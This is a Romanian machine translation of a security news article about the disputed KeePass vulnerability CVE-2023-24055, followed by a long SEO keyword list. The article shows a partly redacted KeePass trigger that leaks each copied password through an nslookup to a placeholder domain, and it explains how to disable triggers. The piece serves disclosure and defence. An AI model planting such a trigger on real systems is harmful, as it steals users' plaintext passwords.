Au fost câteva săptămâni demne de știre pentru managerii de parole – acele utilitare la îndemână care vă ajută să găsiți o parolă diferită pentru fiecare site web pe care îl utilizați și apoi să le urmăriți pe toate.
La sfârșitul anului 2022, a venit rândul LastPass să fie peste tot în știri, când compania a recunoscut în sfârșit că o încălcare pe care a suferit-o în august 2022 a ajuns într-adevăr cu parola clienților. seifuri fiind furate de la serviciul cloud unde au fost făcute copii de rezervă.
(Parolele în sine nu au fost furate, deoarece seifurile au fost criptate, iar LastPass nu avea copii ale „cheii principale” ale nimănui pentru fișierele de rezervă ale seifului în sine, dar a fost un nivel mai atent decât au fost bucuroși cei mai mulți oameni să audă.)
Apoi a venit rândul lui LifeLock să apară peste tot în știri, când compania a avertizat despre ceea ce părea o erupție de atacuri de ghicire a parolelor, probabil bazat pe parole furate de pe un site complet diferit, probabil cu ceva timp în urmă, și poate cumpărate recent de pe dark web.
LifeLock în sine nu a fost încălcat, dar unii dintre utilizatorii săi au făcut-o, datorită comportamentului de partajare a parolelor cauzat de riscuri pe care s-ar putea să nu-și amintească nici măcar că și-au asumat-o.
Concurenții 1Password și BitWarden au fost și ei în știri recent, pe baza rapoartelor de reclame rău intenționate, difuzate aparent fără să vrea de Google, care i-au atras în mod convingător pe utilizatori să reproducă paginile de conectare care vizează phishing-ul detaliilor contului lor.
Acum este rândul lui KeePass la stiri, de data aceasta pentru încă o problemă de securitate cibernetică: o presupusă vulnerabilitate, termenul din jargon folosit pentru erori de software care duc la găuri de securitate cibernetică pe care atacatorii le-ar putea exploata în scopuri malefice.
Mirosirea parolei este ușor
Ne referim la el ca la a vulnerabilitate aici, deoarece are un identificator oficial de eroare, emis de Institutul Național pentru Standarde și Tehnologie din SUA.
Bug-ul a fost dublat CVE-2023-24055: Atacatorul care are acces de scriere la fișierul de configurare XML [poate] obține parolele în text clar adăugând un declanșator de export.
Afirmația despre posibilitatea de a obține parole cu text clar, din păcate, este adevărată.
Dacă am acces de scriere la fișierele dvs. personale, inclusiv la așa-numitele dvs %APPDATA%
director, pot modifica pe furiș secțiunea de configurare pentru a modifica orice setări KeePass pe care le-ați personalizat deja sau pentru a adăuga personalizări dacă nu ați schimbat nimic cu bună știință...
…și pot să vă fur surprinzător de ușor parolele de text simplu, fie în vrac, de exemplu, aruncând întreaga bază de date ca fișier CSV necriptat, fie pe măsură ce le utilizați, de exemplu, setând un „program hook” care se declanșează de fiecare dată când accesați un parola din baza de date.
Rețineți că nu am nevoie Administrator privilegii, pentru că nu trebuie să mă încurc cu directorul de instalare real în care este stocată aplicația KeePass, care este de obicei interzis utilizatorilor obișnuiți
Și nu am nevoie de acces la setările de configurare globale blocate.
Interesant, KeePass face tot posibilul pentru a opri parolele tale să fie adulmecate atunci când le folosești, inclusiv folosind tehnici de protecție împotriva falsificării pentru a opri diverse trucuri anti-keylogger chiar și de la utilizatorii care au deja puteri de administrator de sistem.
Dar software-ul KeePass face, de asemenea, surprinzător de ușor să capturați datele parolelor în text simplu, poate în moduri pe care le-ați putea considera „prea ușor”, chiar și pentru non-administratori.
A fost un minut de muncă să folosim interfața KeePass pentru a crea un trăgaci eveniment să ruleze de fiecare dată când copiați o parolă în clipboard și să setați acel eveniment să facă o căutare DNS care a inclus atât numele de utilizator, cât și parola text simplu în cauză:
Am putea apoi copia setarea XML nu îngrozitor de evidentă pentru acea opțiune din propriul nostru fișier de configurare local în fișierul de configurare al altui utilizator de pe sistem, după care și ei ar descoperi că parolele lor sunt scurse pe internet prin căutări DNS.
Chiar dacă datele de configurare XML sunt în mare măsură citite și informative, KeePass folosește în mod curios șiruri de date aleatorii cunoscute sub numele de GUID-uri (prescurtare pentru identificatori unici la nivel global) pentru a desemna diversele trăgaci setări, astfel încât chiar și un utilizator bine informat ar avea nevoie de o listă extinsă de referințe pentru a înțelege care declanșatoare sunt setate și cum.
Iată cum arată declanșatorul nostru de scurgeri DNS, deși am redactat unele dintre detalii, astfel încât să nu puteți face față la nicio răutate imediată doar prin copierea și inserarea directă a acestui text:
XXXXXXXXXXXXXXXXXXXX Copie Furați lucruri prin căutări DNS XXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXX.blah.test Adevărat 1
Cu acest declanșator activ, accesarea unei parole KeePass face ca textul simplu să se scurgă într-o căutare discretă DNS către un domeniu la alegerea mea, care este blah.test
în acest exemplu.
Rețineți că, aproape sigur, atacatorii din viața reală vor amesteca sau ofusca textul furat, ceea ce nu numai că ar face mai greu de identificat când au loc scurgeri de DNS, ci ar avea grijă și de parolele care conțin caractere non-ASCII, cum ar fi litere accentuate sau emoji-uri. care nu pot fi folosite altfel în numele DNS:
Dar este cu adevărat un bug?
Întrebarea dificilă este însă, „Este într-adevăr o eroare sau este doar o caracteristică puternică care ar putea fi abuzată de cineva care ar avea deja nevoie de cel puțin la fel de mult control asupra fișierelor tale private ca și tu însuți?”
Mai simplu spus, este o vulnerabilitate dacă cineva care deține deja controlul contului tău poate să se încurce cu fișierele pe care contul tău ar trebui să le poată accesa oricum?
Chiar dacă ați putea spera că un manager pssword va include o mulțime de straturi suplimentare de protecție împotriva falsificării pentru a îngreuna abuzarea erorilor/funcțiilor de acest fel, ar trebui să CVE-2023-24055 chiar să fie o vulnerabilitate listată în CVE?
Dacă da, nu ar face comenzi precum DEL
(ștergeți un fișier) și FORMAT
trebuie să fie și „bug-uri”?
Și nu ar fi însăși existența PowerShell, care face comportamentul potențial periculos mult mai ușor de provocat (încercați powerhsell get-clipboard
, de exemplu), să fie o vulnerabilitate proprie?
Aceasta este poziția lui KeePass, recunoscută de următorul text care a fost adăugat la detaliu „bug”. pe site-ul NIST:
** DISPUTAT ** […] NOTĂ: poziția vânzătorului este că baza de date cu parole nu este destinată să fie securizată împotriva unui atacator care are acel nivel de acces la computerul local.
Ce să fac?
Dacă sunteți un utilizator KeePass autonom, puteți verifica dacă există declanșatoare necinstite, cum ar fi „DNS Stealer” pe care l-am creat mai sus, deschizând aplicația KeePass și examinând Instrumente > Declanșatoare… fereastră:
Rețineți că puteți întoarce întregul trăgaci sistem oprit din această fereastră, pur și simplu deselectând butonul [ ] Enable trigger system
opțiune…
… dar aceasta nu este o setare globală, așa că poate fi reactivată din nou prin fișierul de configurare local și, prin urmare, vă protejează numai de greșeli, mai degrabă decât de un atacator cu acces la contul dvs.
Puteți forța opțiunea dezactivată pentru toată lumea de pe computer, fără opțiune ca aceștia să o dezactiveze, modificând fișierul global „blocare” KeePass.config.enforced.XML
, găsit în directorul în care este instalat însuși programul aplicației.
Declanșatoarele vor fi dezactivate pentru toată lumea dacă fișierul dvs. global de aplicare XML arată astfel:
fals
(În cazul în care vă întrebați, un atacator care are acces de scriere la directorul aplicației pentru a inversa această modificare ar avea aproape sigur suficientă putere la nivel de sistem pentru a modifica fișierul executabil KeePass în sine sau pentru a instala și activa oricum un keylogger autonom.)
Dacă sunteți un administrator de rețea însărcinat să blocheze KeePass pe computerele utilizatorilor dvs., astfel încât să fie suficient de flexibil pentru a-i ajuta, dar nu suficient de flexibil pentru ca aceștia să ajute infractorii cibernetici din greșeală, vă recomandăm să citiți KeePass. Probleme de securitate pagina, pagina Declanșările pagina, iar Configurație forțată .
- Distribuție de conținut bazat pe SEO și PR. Amplifică-te astăzi.
- Platoblockchain. Web3 Metaverse Intelligence. Cunoștințe amplificate. Accesați Aici.
- Sursa: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- Capabil
- Despre Noi
- mai sus
- Absolut
- acces
- accesarea
- Cont
- activ
- adăugat
- admise
- Anunţuri
- După
- împotriva
- TOATE
- pretins
- deja
- și
- O alta
- aplicaţia
- aplicație
- August
- autor
- Auto
- înapoi
- sprijinit
- imagine de fundal
- Backup
- bazat
- deoarece
- fiind
- frontieră
- De jos
- încălcarea
- Bug
- gandaci
- captura
- pasă
- caz
- cauzată
- cauze
- Centru
- cu siguranță
- Schimbare
- caractere
- verifica
- alegere
- pretinde
- mai aproape
- Cloud
- culoare
- cum
- companie
- complet
- calculator
- Calculatoare
- Condiții
- Configuraţie
- Lua în considerare
- Control
- copii
- ar putea
- acoperi
- crea
- a creat
- cve
- cybercriminals
- Securitate cibernetică
- Periculos
- Întuneric
- Web întunecat
- de date
- Baza de date
- detalii
- FĂCUT
- diferit
- direct
- Afişa
- dns
- domeniu
- Dont
- jos
- numit
- mai ușor
- cu ușurință
- oricare
- criptate
- executare
- suficient de
- Întreg
- Chiar
- eveniment
- Fiecare
- toată lumea
- exemplu
- Exploata
- exporturile
- extensiv
- suplimentar
- Caracteristică
- puțini
- Fișier
- Fişiere
- În cele din urmă
- Găsi
- flexibil
- următor
- Forţarea
- găsit
- din
- obține
- obtinerea
- Caritate
- Merge
- la indemana
- fericit
- având în
- înălțime
- ajutor
- aici
- găuri
- speranţă
- planare
- Cum
- Totuși
- HTML
- HTTPS
- identificator
- imediat
- in
- include
- inclus
- Inclusiv
- informativ
- instala
- instanță
- Institut
- Internet
- problema
- Emis
- IT
- în sine
- jargon
- A pastra
- cunoscut
- în mare măsură
- LastPass
- straturi
- conduce
- scăpa
- Scurgeri
- Nivel
- Listă
- local
- uitat
- Se pare
- căutare
- făcut
- face
- FACE
- manager
- Manageri
- Margine
- max-width
- ar putea
- greşeală
- greşeli
- modifica
- cele mai multe
- nume
- național
- Nevoie
- reţea
- ştiri
- nist
- normală.
- obține
- oficial
- de deschidere
- Opțiune
- in caz contrar
- propriu
- parametru
- Parolă
- Parolele
- Paul
- PC
- oameni
- poate
- personal
- Phishing
- Text simplu
- Plato
- Informații despre date Platon
- PlatoData
- poziţie
- postări
- potenţial
- putere
- puternic
- competenţelor
- PowerShell
- privat
- privilegii
- probabil
- Program
- cumparate
- scopuri
- pune
- întrebare
- aleator
- eritem
- Citind
- recent
- recomanda
- regulat
- minte
- răspunde
- Raportat
- Rapoarte
- inversa
- Riscurile
- Alerga
- Secțiune
- sigur
- sens
- serviciu
- set
- instalare
- setări
- Pantaloni scurți
- să
- pur şi simplu
- So
- Software
- solid
- unele
- Cineva
- Loc
- standalone
- standarde
- Încă
- furate
- Stop
- stocate
- astfel de
- a presupus
- SVG
- sistem
- Lua
- tehnici de
- Tehnologia
- lor
- se
- prin urmare
- Prin
- timp
- la
- de asemenea
- top
- urmări
- tranziţie
- transparent
- declanşa
- adevărat
- ÎNTORCĂ
- transformat
- tipic
- unic
- URL-ul
- us
- utilizare
- Utilizator
- utilizatorii
- utilitati
- diverse
- Boltă
- bolti
- de
- vulnerabilitate
- W3
- modalități de
- web
- website
- săptămâni
- Ce
- care
- OMS
- voi
- întrebam
- Apartamente
- ar
- scrie
- XML
- Ta
- te
- zephyrnet